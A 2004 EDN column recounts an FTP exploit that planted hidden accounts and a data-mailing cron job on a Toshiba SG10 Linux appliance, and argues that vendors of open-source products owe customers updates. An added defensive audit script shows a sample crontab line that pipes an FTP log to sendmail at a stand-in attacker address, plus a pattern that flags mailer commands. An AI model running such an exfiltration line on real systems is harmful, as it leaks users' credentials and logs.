Visibility=vulnerability

By Brian Dipert, Technical Editor -- EDN, March 18, 2004

I've just wrapped up a pretty nerve-racking 24 hours of computer inspection, education, and cleanup. As a result, I've revised my position on open-source software, in an admittedly pessimistic direction. My experience reveals some critical lessons for those of you planning to include open-source products in your future system designs.

For almost a year and a half now, I've been running a Toshiba Magnia SG10 server appliance on my LAN. Mostly, I use it as a Samba-based print server and NAS (network-attached-storage) device, a repository for WMA (Windows Media Audio)-ripped audio-CD files and digital-camera images, and a means of backing up e-mail, finance-software databases, and other important files. The SG10 is capable of much more, though. It's a full-blown displayless PC running Red Hat Linux 6.1 and containing various open-source server packages, including WU-FTP, Sendmail and other e-mail software, the Apache Web server, DHCP and DNS, Squid for proxies, and telnet.

Yahoo Groups hosts active user-discussion communities, of which I'm a member, for the SG10 and follow-on SG20. The other day, a Linux-savvy owner reported that he'd figured out how to make the SG10 regularly poll a user-definable date and time server and, if necessary, adjust the SG10's hardware and system clocks. His utility makes use of Linux's cron daemon, which automatically runs commands and multicommand scripts at user-defined intervals. I'm a command-line Linux neophyte, but via the powerful, GUI-based Webmin utility, I've developed some limited skill in navigating my way around Linux. (I installed the utility; the SG10's factory-configured software did not include it.) I'd never checked out my SG10's cron settings, so I fired up Webmin and had a look.

What I discovered initially—and increasingly, as I explored more of my system—left me feeling both panic-stricken and extremely vulnerable. Several times, I've briefly opened up a hole in my firewall so that companies with which I work on my various hands-on projects could transfer files to and from the SG10's FTP server. Back in late 2002, a cracker "sniffed" my open FTP port and, via an exploit of WU-FTP, set up hidden user and group accounts (invisible to the Web-browser-based configuration utility that Toshiba ships with the SG10). The cracker also installed "sniffer" software on my SG10 and has since then been receiving a daily e-mail from the SG10 (thereby bypassing my firewall's protection) with cleartext login and password information.

After I calmed down, I could more accurately assess the extent of the damage. It appears that the only information being sent was a cumulative log of WU-FTP access attempts. Because I infrequently used the SG10's FTP server and only briefly exposed it to the Internet through port 21, the cracker could rarely make use of the information he or she obtained. I've disabled the cron script sending the e-mail, deleted the cracker's user and group accounts, and shut down the auto-load of Sendmail on system boot that was, by default, configured on the SG10. I think I've regained control of the situation. The impact of the cracker's exploit could have been (and may still be, unbeknown to me) far worse. Had I relied on only the Toshiba configuration menus, I never would have known I had a mess on my hands.
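The two signs described above, accounts that the vendor's Web-based configuration utility never lists and a cron job that hands a log to a mailer, can be checked for without a GUI. The following shell script is an added example, not code from this column or from Toshiba's SG10 software; it compares a passwd file against a baseline of the accounts the configuration utility is expected to show, flags any non-root account with UID 0, and lists cron entries whose command runs a mailer. The passwd file, baseline, and crontab it reads are constructed sample data embedded in the script.

```shell
#!/bin/sh
# Added example (not from the EDN column or the SG10 software): a small
# baseline audit for hidden accounts and cron jobs that mail data out.
# All three input files below are constructed for this example. On a real
# host, compare /etc/passwd against an export of the accounts the vendor
# UI shows, and read /etc/crontab plus the files under /var/spool/cron.

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# Constructed /etc/passwd: "ftpd" and "sysop" were never created through
# the vendor UI, and "ftpd" carries UID 0, i.e. full root privilege.
cat > "$WORK/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/sbin:/bin/sh
ftp:x:14:50:FTP User:/home/ftp:/bin/sh
brian:x:500:500:Brian:/home/brian:/bin/bash
ftpd:x:0:0::/var/tmp/.x:/bin/bash
sysop:x:501:501::/tmp/.s:/bin/sh
EOF

# Constructed baseline: one login name per line, as the vendor UI lists them.
cat > "$WORK/baseline" <<'EOF'
root
bin
daemon
ftp
brian
EOF

# Constructed system crontab: two ordinary jobs and one that pipes an FTP
# transfer log into sendmail every night (hypothetical recipient address).
cat > "$WORK/crontab" <<'EOF'
# system-wide jobs
01 * * * * root run-parts /etc/cron.hourly
15 3 * * * root /usr/bin/ntpdate -s pool.example.net
30 4 * * * root cat /var/tmp/.x/xferlog | /usr/sbin/sendmail attacker@example.net
EOF

# Print "UNLISTED:<name>" for every passwd entry absent from the baseline
# and "UID0:<name>" for every non-root account whose UID is 0.
# Usage: audit_accounts <passwd-file> <baseline-file>
audit_accounts() {
    awk -F: '
        NR == FNR { known[$1] = 1; next }        # first file: baseline names
        !($1 in known)           { print "UNLISTED:" $1 }
        $3 == 0 && $1 != "root"  { print "UID0:" $1 }
    ' "$2" "$1"
}

# Print crontab lines (comments and blanks skipped) whose command runs
# sendmail, mail or mailx, with or without a full path. A scheduled job
# that mails a log is worth a manual look even when the recipient is local.
# Usage: audit_cron <crontab-file>
audit_cron() {
    grep -Ev '^[[:space:]]*(#|$)' "$1" \
      | grep -E '(^|[|;&[:space:]])(/usr/sbin/|/usr/bin/|/bin/)?(sendmail|mail|mailx)([[:space:]]|$)' \
      || true
}

echo "== accounts not in the vendor UI baseline, or with UID 0 =="
audit_accounts "$WORK/passwd" "$WORK/baseline"
echo "== cron jobs that hand data to a mailer =="
audit_cron "$WORK/crontab"
```

Run as written, the script reports `ftpd` twice (unlisted and UID 0), `sysop` once, and the single sendmail cron line; the baseline comparison is the part that matters, because an account the configuration utility does not display is exactly the kind the column describes as invisible.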

Toshiba provides a Windows Update-like feature on the SG10 that regularly polls for operating-system and application updates. This feature could have patched the WU-FTP exploit, had a fix been available in time. Unfortunately for me and other SG10 owners, the system is no longer in production, and maintenance of the software image is therefore no longer occurring. Theoretically, I could regularly monitor relevant software Web sites to identify and install updates for the SG10's Internet-exposed programs, but such a scenario is improbable even for an atypical geek like me. I can't imagine most owners of Linux-powered equipment taking this approach, even if they knew what operating system their widget ran. And, if you burn the OS and applications to ROM, updates are impossible.

Open-source software has some compelling selling points. For one thing, it's free, and the many thousands of developer eyeballs peering over it generally result in robust code. When a vulnerability is discovered, those same developers quickly fix it. But among those thousands of eyeballs are sets with more nefarious objectives in mind, and access to source code enables them to develop exploits for unpatched, easily identified software builds. Certainly, you should consider open-source products. But realize, when you do, the obligation you have to your customers to quickly and easily provide updates. Realize, too, the legal quagmire you may stumble into if you don't.

Contact me at bdipert@edn.com.
